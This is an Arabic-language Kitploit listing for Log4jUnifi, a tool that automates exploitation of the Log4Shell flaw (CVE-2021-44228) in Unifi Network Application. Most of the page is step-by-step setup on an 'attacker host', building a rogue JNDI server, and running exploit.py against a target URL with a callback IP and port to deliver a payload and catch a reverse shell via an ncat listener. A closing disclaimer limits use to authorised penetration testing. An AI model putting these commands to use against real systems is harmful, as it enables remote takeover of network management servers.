Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Log4jUnifi — استغلال CVE-2021-44228 في تطبيق Unifi Network Application لتنفيذ التعليمات البرمجية عن بُعد والمزيد. | Kitploit
أدوات/GitHubGitHub/puzzlepeaches/log4junifi
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHubpuzzlepeaches/log4junifi

Log4jUnifi

استغلال CVE-2021-44228 في تطبيق Unifi Network Application لتنفيذ التعليمات البرمجية عن بُعد والمزيد.

عرض المستودع
17031منذ 2 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Log4jUnifi

استغلال CVE-2021-44228 في تطبيق Unifi Network لتنفيذ التعليمات البرمجية عن بُعد والمزيد.

  • Log4j أخرى على النار: Unifi

لماذا؟

إن إثباتات المفاهيم لهذه الثغرة متفرقة ويجب تنفيذها يدويًا. يقوم هذا المستودع بأتمتة عملية الاستغلال. راجع منشور المدونة أعلاه للحصول على إرشادات حول مرحلة ما بعد الاستغلال.

التثبيت

يمكن استخدام هذا المستودع يدويًا أو باستخدام Docker.

التثبيت اليدوي

لتنزيل الأداة الاستغلالية وتشغيلها يدويًا، قم بتنفيذ الخطوات التالية. أولاً، تأكد من تثبيت Java و Maven على مضيفك المهاجم. للقيام بذلك باستخدام apt على أنظمة التشغيل المبنية على Debian، قم بتشغيل الأمر التالي:

root@kitploit:~
apt update && apt install openjdk-11-jre maven

استنسخ مستودع GitHub وقم بتثبيت جميع متطلبات Python:

root@kitploit:~
git clone --recurse-submodules https://github.com/puzzlepeaches/Log4jUnifi \
    && cd Log4jUnifi && pip3 install -r requirements.txt

من جذر مستودع Log4jUnifi، قم بتجميع مشروع Rogue-Jndi باستخدام الأمر أدناه:

root@kitploit:~
mvn package -f utils/rogue-jndi/

التثبيت باستخدام Docker

أولاً، تأكد من تثبيت Docker على مضيفك المهاجم. (لن أشرح لك كيفية القيام بذلك)

بعد ذلك، قم بتنفيذ الأمر التالي لاستنساخ المستودع وبناء صورة Docker التي سنستخدمها.

root@kitploit:~
git clone --recurse-submodules https://github.com/puzzlepeaches/Log4jUnifi \
    && cd Log4jUnifi && docker build -t log4junifi .

لتشغيل الحاوية، قم بتشغيل أمر مشابه للتالي مع إلحاق علامات سطر الأوامر الخاصة بك. لاحظ أن الحاوية لن تلتقط الصدفة العكسية. تحتاج إلى إنشاء مستمع ncat في جلسة طرفية منفصلة:

root@kitploit:~
docker run -it -v $(pwd)/loot:/Log4jUnifi/loot -p 8090:8090 -p 1389:1389 log4junifi \ 
    -u https://unifi.acme.com:8443 -i 192.168.1.1 -p 4444

الاستخدام

root@kitploit:~
usage: exploit.py [-h] -u URL -i CALLBACK -p PORT

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     Unifi Network Manager base URL
  -i CALLBACK, --ip CALLBACK
                        Callback IP for payload delivery and reverse shell.
  -p PORT, --port PORT  Callback port for reverse shell.

أمثلة

احصل على صدفة عكسية باستخدام الأداة المثبتة على نظامك المحلي:

root@kitploit:~
python3 exploit.py -u https://unifi.acme.com:8443 -i 10.10.10.1 -p 4444

إخلاء مسؤولية

هذه الأداة مصممة للاستخدام أثناء اختبار الاختراق؛ استخدام هذه الأداة لمهاجمة أهداف دون موافقة متبادلة مسبقة غير قانوني. تقع على عاتق المستخدم النهائي مسؤولية الامتثال لجميع القوانين المحلية والولائية والفيدرالية المعمول بها. لا يتحمل المطورون أي مسؤولية ولا يكونون مسؤولين عن أي إساءة استخدام لهذا البرنامج.

تنزيل الأداة